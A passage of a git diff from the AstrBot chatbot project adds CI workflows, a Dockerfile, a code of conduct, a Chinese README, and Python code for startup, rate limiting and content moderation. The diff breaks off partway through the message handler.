||||
#
|
||||
# ******** NOTE ********
|
||||
# We have attempted to detect the languages in your repository. Please check
|
||||
# the `language` matrix defined below to confirm you have the correct set of
|
||||
# supported CodeQL languages.
|
||||
#
|
||||
name: "CodeQL"
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [ "master" ]
|
||||
pull_request:
|
||||
branches: [ "master" ]
|
||||
schedule:
|
||||
- cron: '21 15 * * 5'
|
||||
|
||||
jobs:
|
||||
analyze:
|
||||
name: Analyze (${{ matrix.language }})
|
||||
# Runner size impacts CodeQL analysis time. To learn more, please see:
|
||||
# - https://gh.io/recommended-hardware-resources-for-running-codeql
|
||||
# - https://gh.io/supported-runners-and-hardware-resources
|
||||
# - https://gh.io/using-larger-runners (GitHub.com only)
|
||||
# Consider using larger runners or machines with greater resources for possible analysis time improvements.
|
||||
runs-on: ${{ (matrix.language == 'swift' && 'macos-latest') || 'ubuntu-latest' }}
|
||||
timeout-minutes: ${{ (matrix.language == 'swift' && 120) || 360 }}
|
||||
permissions:
|
||||
# required for all workflows
|
||||
security-events: write
|
||||
|
||||
# required to fetch internal or private CodeQL packs
|
||||
packages: read
|
||||
|
||||
# only required for workflows in private repositories
|
||||
actions: read
|
||||
contents: read
|
||||
|
||||
strategy:
|
||||
fail-fast: false
|
||||
matrix:
|
||||
include:
|
||||
- language: python
|
||||
build-mode: none
|
||||
# CodeQL supports the following values keywords for 'language': 'c-cpp', 'csharp', 'go', 'java-kotlin', 'javascript-typescript', 'python', 'ruby', 'swift'
|
||||
# Use `c-cpp` to analyze code written in C, C++ or both
|
||||
# Use 'java-kotlin' to analyze code written in Java, Kotlin or both
|
||||
# Use 'javascript-typescript' to analyze code written in JavaScript, TypeScript or both
|
||||
# To learn more about changing the languages that are analyzed or customizing the build mode for your analysis,
|
||||
# see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/customizing-your-advanced-setup-for-code-scanning.
|
||||
# If you are analyzing a compiled language, you can modify the 'build-mode' for that language to customize how
|
||||
# your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v4
|
||||
|
||||
# Initializes the CodeQL tools for scanning.
|
||||
- name: Initialize CodeQL
|
||||
uses: github/codeql-action/init@v3
|
||||
with:
|
||||
languages: ${{ matrix.language }}
|
||||
build-mode: ${{ matrix.build-mode }}
|
||||
# If you wish to specify custom queries, you can do so here or in a config file.
|
||||
# By default, queries listed here will override any specified in a config file.
|
||||
# Prefix the list here with "+" to use these queries and those in the config file.
|
||||
|
||||
# For more details on CodeQL's query packs, refer to: https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
|
||||
# queries: security-extended,security-and-quality
|
||||
|
||||
# If the analyze step fails for one of the languages you are analyzing with
|
||||
# "We were unable to automatically build your code", modify the matrix above
|
||||
# to set the build mode to "manual" for that language. Then modify this step
|
||||
# to build your code.
|
||||
# ℹ️ Command-line programs to run using the OS shell.
|
||||
# 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun
|
||||
- if: matrix.build-mode == 'manual'
|
||||
shell: bash
|
||||
run: |
|
||||
echo 'If you are using a "manual" build mode for one or more of the' \
|
||||
'languages you are analyzing, replace this with the commands to build' \
|
||||
'your code, for example:'
|
||||
echo ' make bootstrap'
|
||||
echo ' make release'
|
||||
exit 1
|
||||
|
||||
- name: Perform CodeQL Analysis
|
||||
uses: github/codeql-action/analyze@v3
|
||||
with:
|
||||
category: "/language:${{matrix.language}}"
|
||||
39
.github/workflows/coverage_test.yml
vendored
Normal file
@@ -0,0 +1,39 @@
|
||||
name: Run tests and upload coverage
|
||||
|
||||
on:
|
||||
push
|
||||
|
||||
jobs:
|
||||
test:
|
||||
name: Run tests and collect coverage
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v4
|
||||
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r requirements.txt
|
||||
pip install pytest pytest-cov pytest-asyncio
|
||||
mkdir data
|
||||
mkdir data/plugins
|
||||
mkdir data/config
|
||||
mkdir temp
|
||||
|
||||
- name: Run tests
|
||||
run: |
|
||||
export LLM_MODEL=${{ secrets.LLM_MODEL }}
|
||||
export OPENAI_API_BASE=${{ secrets.OPENAI_API_BASE }}
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
PYTHONPATH=./ pytest --cov=. tests/ -v
|
||||
|
||||
- name: Upload results to Codecov
|
||||
uses: codecov/codecov-action@v4
|
||||
with:
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
42
.github/workflows/docker-image.yml
vendored
Normal file
@@ -0,0 +1,42 @@
|
||||
name: Docker Image CI/CD
|
||||
|
||||
on:
|
||||
release:
|
||||
types: [published]
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
publish-docker:
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- name: 拉取源码
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 1
|
||||
|
||||
- name: 设置 QEMU
|
||||
uses: docker/setup-qemu-action@v3
|
||||
|
||||
- name: 设置 Docker Buildx
|
||||
uses: docker/setup-buildx-action@v3
|
||||
|
||||
- name: 登录到 DockerHub
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
username: ${{ secrets.DOCKER_HUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKER_HUB_PASSWORD }}
|
||||
|
||||
- name: 构建和推送 Docker hub
|
||||
uses: docker/build-push-action@v6
|
||||
with:
|
||||
context: .
|
||||
platforms: linux/amd64,linux/arm64
|
||||
push: true
|
||||
tags: |
|
||||
${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest
|
||||
${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:${{ github.event.release.tag_name }}
|
||||
|
||||
- name: Post build notifications
|
||||
run: echo "Docker image has been built and pushed successfully"
|
||||
|
||||
27
.github/workflows/stale.yml
vendored
Normal file
@@ -0,0 +1,27 @@
|
||||
# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
|
||||
#
|
||||
# You can adjust the behavior by modifying this file.
|
||||
# For more information, see:
|
||||
# https://github.com/actions/stale
|
||||
name: Mark stale issues and pull requests
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: '21 23 * * *'
|
||||
|
||||
jobs:
|
||||
stale:
|
||||
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
issues: write
|
||||
pull-requests: write
|
||||
|
||||
steps:
|
||||
- uses: actions/stale@v5
|
||||
with:
|
||||
repo-token: ${{ secrets.GITHUB_TOKEN }}
|
||||
stale-issue-message: 'Stale issue message'
|
||||
stale-pr-message: 'Stale pull request message'
|
||||
stale-issue-label: 'no-issue-activity'
|
||||
stale-pr-label: 'no-pr-activity'
|
||||
14
.gitignore
vendored
Normal file
@@ -0,0 +1,14 @@
|
||||
__pycache__
|
||||
botpy.log
|
||||
.vscode
|
||||
data.db
|
||||
configs/session
|
||||
configs/config.yaml
|
||||
**/.DS_Store
|
||||
temp
|
||||
cmd_config.json
|
||||
data/*
|
||||
cookies.json
|
||||
logs/
|
||||
addons/plugins
|
||||
.coverage
|
||||
3
.vscode/settings.json
vendored
@@ -1,3 +0,0 @@
|
||||
{
|
||||
"python.analysis.typeCheckingMode": "basic"
|
||||
}
|
||||
128
CODE_OF_CONDUCT.md
Normal file
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
SoulterL@outlook.com.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
20
Dockerfile
Normal file
@@ -0,0 +1,20 @@
|
||||
FROM python:3.10-slim
|
||||
WORKDIR /AstrBot
|
||||
|
||||
COPY . /AstrBot/
|
||||
|
||||
RUN apt-get update && apt-get install -y --no-install-recommends \
|
||||
gcc \
|
||||
build-essential \
|
||||
python3-dev \
|
||||
libffi-dev \
|
||||
libssl-dev \
|
||||
&& apt-get clean \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN python -m pip install -r requirements.txt
|
||||
|
||||
EXPOSE 6185
|
||||
EXPOSE 6186
|
||||
|
||||
CMD [ "python", "main.py" ]
|
||||
173
README.md
@@ -1,114 +1,67 @@
|
||||
## ⭐体验
|
||||
扫码加入QQ频道
|
||||
<p align="center">
|
||||
|
||||

|
||||
<img width="750" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/c6f057d9-46d7-4144-8116-00a962941746">
|
||||
|
||||
</p>
|
||||
<div align="center">
|
||||
|
||||
[](https://github.com/Soulter/AstrBot/releases/latest)
|
||||
<img src="https://img.shields.io/badge/python-3.9+-blue.svg" alt="python">
|
||||
<a href="https://hub.docker.com/r/soulter/astrbot"><img alt="Docker pull" src="https://img.shields.io/docker/pulls/soulter/astrbot.svg"/></a>
|
||||
[](https://codecov.io/gh/Soulter/AstrBot)
|
||||
<a href="https://qm.qq.com/cgi-bin/qm/qr?k=EYGsuUTfe00_iOu9JTXS7_TEpMkXOvwv&jump_from=webapi&authKey=uUEMKCROfsseS+8IzqPjzV3y1tzy4AkykwTib2jNkOFdzezF9s9XknqnIaf3CDft">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/QQ群-322154837-purple">
|
||||
</a>
|
||||
|
||||
<a href="https://astrbot.soulter.top/docs/main">快速开始</a> |
|
||||
<a href="https://github.com/Soulter/AstrBot/issues">问题提交</a> |
|
||||
<a href="https://astrbot.soulter.top/docs/develop/plugin4p">插件开发</a>
|
||||
</div>
|
||||
|
||||
## 🛠️ 功能
|
||||
|
||||
🌍 支持的消息平台
|
||||
- QQ 群、QQ 频道(OneBot、QQ 官方接口)
|
||||
- Telegram([astrbot_plugin_telegram](https://github.com/Soulter/astrbot_plugin_telegram) 插件)
|
||||
|
||||
🌍 支持的大模型/底座:
|
||||
|
||||
- OpenAI GPT、DallE 系列
|
||||
- Claude(由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
- HuggingChat(由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
- Gemini(由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
- Ollama
|
||||
- 几乎所有已知模型(可接入 [OneAPI](https://astrbot.soulter.top/docs/docs/adavanced/one-api))
|
||||
|
||||
🌍 机器人支持的能力一览:
|
||||
- 大模型对话、人格、网页搜索
|
||||
- 可视化仪表盘
|
||||
- 同时处理多平台消息
|
||||
- 精确到个人的会话隔离
|
||||
- 插件支持
|
||||
- 文本转图片回复(Markdown)
|
||||
|
||||
## 🧩 插件
|
||||
|
||||
有关插件的使用和列表请移步:[AstrBot 文档 - 插件](https://astrbot.soulter.top/docs/get-started/plugin)
|
||||
|
||||
## 云部署
|
||||
|
||||
[](https://repl.it/github/Soulter/AstrBot)
|
||||
|
||||
## ❤️ 贡献
|
||||
|
||||
欢迎任何 Issues/Pull Requests!只需要将你的更改提交到此项目 :)
|
||||
|
||||
对于新功能的添加,请先通过 Issue 进行讨论。
|
||||
|
||||
## 🔭 展望
|
||||
|
||||
- [ ] 更多、更开放的 LLM Agent 能力
|
||||
|
||||
## ✨ Demo
|
||||
|
||||
<img width="900" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/824d1ff3-7b85-481c-b795-8e62dedb9fd7">
|
||||
|
||||
|
||||
|
||||
**推荐Windows一键安装(版本更新更及时)!!**
|
||||
**请前往Release下载最新版本**
|
||||
|
||||
**详细部署教程链接**https://soulter.top/posts/qpdg.html
|
||||
|
||||
**详细部署教程链接**https://soulter.top/posts/qpdg.html
|
||||
|
||||
**详细部署教程链接**https://soulter.top/posts/qpdg.html
|
||||
|
||||
有任何问题请加频道反馈。
|
||||
|
||||
|
||||
|
||||
## ⭐功能:
|
||||
|
||||
### 基本功能
|
||||
<details>
|
||||
<summary>✅ 回复符合上下文</summary>
|
||||
|
||||
- 程序向API发送近多次对话内容,模型根据上下文生成回复
|
||||
|
||||
- 你可在`configs/config.yaml`中修改`total_token_limit`来近似控制缓存大小。
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary>✅ 超额自动切换</summary>
|
||||
|
||||
- 超额时,程序自动切换openai的key,方便快捷
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>✅ 支持统计频道、消息数量等信息</summary>
|
||||
|
||||
- 实现了简单的统计功能
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary>✅ 多并发处理,回复速度快</summary>
|
||||
|
||||
- 使用了协程,理论最高可以支持每个子频道每秒回复5条信息
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary>✅ 持久化转储历史记录,重启不丢失</summary>
|
||||
|
||||
- 使用内置的sqlite数据库存储历史记录到本地
|
||||
|
||||
- 方式为定时转储,可在`config.yaml`下修改`dump_history_interval`来修改间隔时间,单位为分钟。
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary>✅ 支持指令控制</summary>
|
||||
|
||||
- 详见下方`指令功能`
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary>✅ 官方API,稳定</summary>
|
||||
|
||||
- 不使用ChatGPT逆向接口,而使用官方API接口,稳定方便。
|
||||
|
||||
- QQ频道机器人框架为QQ官方开源的框架,稳定。
|
||||
|
||||
</details>
|
||||
|
||||
> 关于token:token就相当于是AI中的单词数(但是不等于单词数),`text-davinci-003`模型中最大可以支持`4097`个token。在发送信息时,这个机器人会将用户的历史聊天记录打包发送给ChatGPT,因此,`token`也会相应的累加,为了保证聊天的上下文的逻辑性,就有了缓存token。
|
||||
### 指令功能
|
||||
需要先`@`机器人之后再输入指令
|
||||
- `/reset`重置prompt
|
||||
- `/his`查看历史记录(每个用户都有独立的会话)
|
||||
- `/his [页码数]`查看不同页码的历史记录。例如`/his 2`查看第2页
|
||||
- `/token`查看当前缓存的总token数
|
||||
- `/count` 查看统计
|
||||
- `/status` 查看chatGPT的配置
|
||||
|
||||
## 📰使用方法:
|
||||
|
||||
### 安装第三方库
|
||||
|
||||
使用Python的pip工具安装
|
||||
- `qq-botpy` (QQ频道官方Python SDK)
|
||||
- `openai` (OpenAI 库)
|
||||
```shell
|
||||
pip install -r requirements.txt
|
||||
```
|
||||
> ⚠注意,由于qq-botpy需要运行在`Python 3.8+`的版本上,因此本项目也需要在此之上运行
|
||||
|
||||
### 配置
|
||||
|
||||
- 获得 OpenAI的key [OpenAI](https://beta.openai.com/)
|
||||
- 获得 QQ开放平台下QQ频道机器人的token和appid [QQ开放平台](https://q.qq.com/),一个QQ频道机器人(很容易创建~)
|
||||
- 在configs/config.yaml下进行配置
|
||||
|
||||
### 启动
|
||||
- 启动main.py
|
||||
|
||||
|
||||
## DEMO
|
||||

|
||||

|
||||

|
||||
|
||||
132
astrbot/bootstrap.py
Normal file
@@ -0,0 +1,132 @@
|
||||
import asyncio
|
||||
import traceback
|
||||
import os
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from astrbot.persist.helper import dbConn
|
||||
from dashboard.server import AstrBotDashBoard
|
||||
from model.command.manager import CommandManager
|
||||
from model.command.internal_handler import InternalCommandHandler
|
||||
from model.plugin.manager import PluginManager
|
||||
from model.platform.manager import PlatformManager
|
||||
from typing import Union
|
||||
from type.types import Context
|
||||
from type.config import VERSION
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from util.cmd_config import AstrBotConfig, try_migrate
|
||||
from util.metrics import MetricUploader
|
||||
from util.updator.astrbot_updator import AstrBotUpdator
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class AstrBotBootstrap():
|
||||
def __init__(self) -> None:
|
||||
self.context = Context()
|
||||
|
||||
# load configs and ensure the backward compatibility
|
||||
try_migrate()
|
||||
self.config_helper = AstrBotConfig()
|
||||
self.context.config_helper = self.config_helper
|
||||
logger.info("AstrBot v" + VERSION)
|
||||
# apply proxy settings
|
||||
http_proxy = self.context.config_helper.http_proxy
|
||||
https_proxy = self.context.config_helper.https_proxy
|
||||
if http_proxy:
|
||||
os.environ['HTTP_PROXY'] = http_proxy
|
||||
if https_proxy:
|
||||
os.environ['HTTPS_PROXY'] = https_proxy
|
||||
os.environ['NO_PROXY'] = 'https://api.sgroup.qq.com'
|
||||
|
||||
if http_proxy and https_proxy:
|
||||
logger.info(f"使用代理: {http_proxy}, {https_proxy}")
|
||||
else:
|
||||
logger.info("未使用代理。")
|
||||
|
||||
self.test_mode = os.environ.get('TEST_MODE', 'off') == 'on'
|
||||
|
||||
async def run(self):
|
||||
self.command_manager = CommandManager()
|
||||
self.plugin_manager = PluginManager(self.context)
|
||||
self.updator = AstrBotUpdator()
|
||||
self.cmd_handler = InternalCommandHandler(self.command_manager, self.plugin_manager)
|
||||
self.db_conn_helper = dbConn()
|
||||
|
||||
# load llm provider
|
||||
self.load_llm()
|
||||
|
||||
self.message_handler = MessageHandler(self.context, self.command_manager, self.db_conn_helper)
|
||||
self.platfrom_manager = PlatformManager(self.context, self.message_handler)
|
||||
self.dashboard = AstrBotDashBoard(self.context, plugin_manager=self.plugin_manager, astrbot_updator=self.updator)
|
||||
self.metrics_uploader = MetricUploader(self.context)
|
||||
|
||||
self.context.metrics_uploader = self.metrics_uploader
|
||||
self.context.updator = self.updator
|
||||
self.context.plugin_updator = self.plugin_manager.updator
|
||||
self.context.message_handler = self.message_handler
|
||||
self.context.command_manager = self.command_manager
|
||||
|
||||
|
||||
# load dashboard
|
||||
self.dashboard.run_http_server()
|
||||
dashboard_task = asyncio.create_task(self.dashboard.ws_server(), name="dashboard")
|
||||
|
||||
if self.test_mode:
|
||||
return
|
||||
|
||||
# load plugins, plugins' commands.
|
||||
self.load_plugins()
|
||||
self.command_manager.register_from_pcb(self.context.plugin_command_bridge)
|
||||
|
||||
# load platforms
|
||||
platform_tasks = self.load_platform()
|
||||
# load metrics uploader
|
||||
metrics_upload_task = asyncio.create_task(self.metrics_uploader.upload_metrics(), name="metrics-uploader")
|
||||
|
||||
tasks = [metrics_upload_task, dashboard_task, *platform_tasks, *self.context.ext_tasks]
|
||||
tasks = [self.handle_task(task) for task in tasks]
|
||||
await asyncio.gather(*tasks)
|
||||
|
||||
async def handle_task(self, task: Union[asyncio.Task, asyncio.Future]):
|
||||
while True:
|
||||
try:
|
||||
result = await task
|
||||
return result
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"{task.get_name()} 任务已取消。")
|
||||
return
|
||||
except Exception as e:
|
||||
logger.error(traceback.format_exc())
|
||||
logger.error(f"{task.get_name()} 任务发生错误。")
|
||||
return
|
||||
|
||||
def load_llm(self):
|
||||
f = False
|
||||
llms = self.context.config_helper.llm
|
||||
logger.info(f"加载 {len(llms)} 个 LLM Provider...")
|
||||
for llm in llms:
|
||||
if llm.enable:
|
||||
if llm.name == "openai" and llm.key and llm.enable:
|
||||
self.load_openai(llm)
|
||||
f = True
|
||||
logger.info(f"已启用 OpenAI API 支持。")
|
||||
else:
|
||||
logger.warn(f"未知的 LLM Provider: {llm.name}")
|
||||
if f:
|
||||
from model.command.openai_official_handler import OpenAIOfficialCommandHandler
|
||||
self.openai_command_handler = OpenAIOfficialCommandHandler(self.command_manager)
|
||||
self.openai_command_handler.set_provider(self.context.llms[0].llm_instance)
|
||||
|
||||
def load_openai(self, llm_config):
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial
|
||||
inst = ProviderOpenAIOfficial(llm_config)
|
||||
self.context.register_provider("internal_openai", inst)
|
||||
|
||||
def load_plugins(self):
|
||||
self.plugin_manager.plugin_reload()
|
||||
|
||||
def load_platform(self):
|
||||
platforms = self.platfrom_manager.load_platforms()
|
||||
if not platforms:
|
||||
logger.warn("未启用任何消息平台。")
|
||||
return platforms
|
||||
28
astrbot/message/baidu_aip_judge.py
Normal file
@@ -0,0 +1,28 @@
|
||||
from aip import AipContentCensor
|
||||
from util.cmd_config import BaiduAIPConfig
|
||||
|
||||
|
||||
class BaiduJudge:
|
||||
def __init__(self, baidu_configs: BaiduAIPConfig) -> None:
|
||||
self.app_id = baidu_configs.app_id
|
||||
self.api_key = baidu_configs.api_key
|
||||
self.secret_key = baidu_configs.secret_key
|
||||
self.client = AipContentCensor(self.app_id,
|
||||
self.api_key,
|
||||
self.secret_key)
|
||||
|
||||
def judge(self, text):
|
||||
res = self.client.textCensorUserDefined(text)
|
||||
if 'conclusionType' not in res:
|
||||
return False, "百度审核服务未知错误"
|
||||
if res['conclusionType'] == 1:
|
||||
return True, "合规"
|
||||
else:
|
||||
if 'data' not in res:
|
||||
return False, "百度审核服务未知错误"
|
||||
count = len(res['data'])
|
||||
info = f"百度审核服务发现 {count} 处违规:\n"
|
||||
for i in res['data']:
|
||||
info += f"{i['msg']};\n"
|
||||
info += "\n判断结果:"+res['conclusion']
|
||||
return False, info
|
||||
286
astrbot/message/handler.py
Normal file
@@ -0,0 +1,286 @@
|
||||
import time, json
|
||||
import re, os
|
||||
import asyncio
|
||||
import traceback
|
||||
import astrbot.message.unfit_words as uw
|
||||
|
||||
from typing import Dict
|
||||
from astrbot.persist.helper import dbConn
|
||||
from model.provider.provider import Provider
|
||||
from model.command.manager import CommandManager
|
||||
from type.message_event import AstrMessageEvent, MessageResult
|
||||
from type.types import Context
|
||||
from type.command import CommandResult
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from nakuru.entities.components import Image
|
||||
from util.agent.func_call import FuncCall
|
||||
import util.agent.web_searcher as web_searcher
|
||||
from openai._exceptions import *
|
||||
from openai.types.chat.chat_completion_message_tool_call import Function
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class RateLimitHelper():
|
||||
def __init__(self, context: Context) -> None:
|
||||
self.user_rate_limit: Dict[int, int] = {}
|
||||
rl = context.config_helper.platform_settings.rate_limit
|
||||
self.rate_limit_time: int = rl.time
|
||||
self.rate_limit_count: int = rl.count
|
||||
self.user_frequency = {}
|
||||
|
||||
def check_frequency(self, session_id: str) -> bool:
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
ts = int(time.time())
|
||||
if session_id in self.user_frequency:
|
||||
if ts-self.user_frequency[session_id]['time'] > self.rate_limit_time:
|
||||
self.user_frequency[session_id]['time'] = ts
|
||||
self.user_frequency[session_id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if self.user_frequency[session_id]['count'] >= self.rate_limit_count:
|
||||
return False
|
||||
else:
|
||||
self.user_frequency[session_id]['count'] += 1
|
||||
return True
|
||||
else:
|
||||
t = {'time': ts, 'count': 1}
|
||||
self.user_frequency[session_id] = t
|
||||
return True
|
||||
|
||||
class ContentSafetyHelper():
|
||||
def __init__(self, context: Context) -> None:
|
||||
self.baidu_judge = None
|
||||
aip = context.config_helper.content_safety.baidu_aip
|
||||
if aip.enable:
|
||||
try:
|
||||
from astrbot.message.baidu_aip_judge import BaiduJudge
|
||||
self.baidu_judge = BaiduJudge(aip)
|
||||
logger.info("已启用百度 AI 内容审核。")
|
||||
except ImportError as e:
|
||||
logger.error("检测到库依赖不完整,将不会启用百度 AI 内容审核。请先使用 pip 安装 `baidu_aip` 包。")
|
||||
logger.error(e)
|
||||
except BaseException as e:
|
||||
logger.error("百度 AI 内容审核初始化失败。")
|
||||
logger.error(e)
|
||||
|
||||
async def check_content(self, content: str) -> bool:
|
||||
'''
|
||||
检查文本内容是否合法
|
||||
'''
|
||||
for i in uw.unfit_words_q:
|
||||
matches = re.match(i, content.strip(), re.I | re.M)
|
||||
if matches:
|
||||
return False
|
||||
if self.baidu_judge != None:
|
||||
check, msg = await asyncio.to_thread(self.baidu_judge.judge, content)
|
||||
if not check:
|
||||
logger.info(f"百度 AI 内容审核发现以下违规:{msg}")
|
||||
return False
|
||||
return True
|
||||
|
||||
def filter_content(self, content: str) -> str:
|
||||
'''
|
||||
过滤文本内容
|
||||
'''
|
||||
for i in uw.unfit_words_q:
|
||||
content = re.sub(i, "*", content, flags=re.I)
|
||||
return content
|
||||
|
||||
def baidu_check(self, content: str) -> bool:
|
||||
'''
|
||||
使用百度 AI 内容审核检查文本内容是否合法
|
||||
'''
|
||||
if self.baidu_judge != None:
|
||||
check, msg = self.baidu_judge.judge(content)
|
||||
if not check:
|
||||
logger.info(f"百度 AI 内容审核发现以下违规:{msg}")
|
||||
return False
|
||||
return True
|
||||
|
||||
class MessageHandler():
|
||||
def __init__(self, context: Context,
|
||||
command_manager: CommandManager,
|
||||
persist_manager: dbConn) -> None:
|
||||
self.context = context
|
||||
self.command_manager = command_manager
|
||||
self.persist_manager = persist_manager
|
||||
self.rate_limit_helper = RateLimitHelper(context)
|
||||
self.content_safety_helper = ContentSafetyHelper(context)
|
||||
self.llm_wake_prefix = self.context.config_helper.llm_settings.wake_prefix
|
||||
if self.llm_wake_prefix:
|
||||
self.llm_wake_prefix = self.llm_wake_prefix.strip()
|
||||
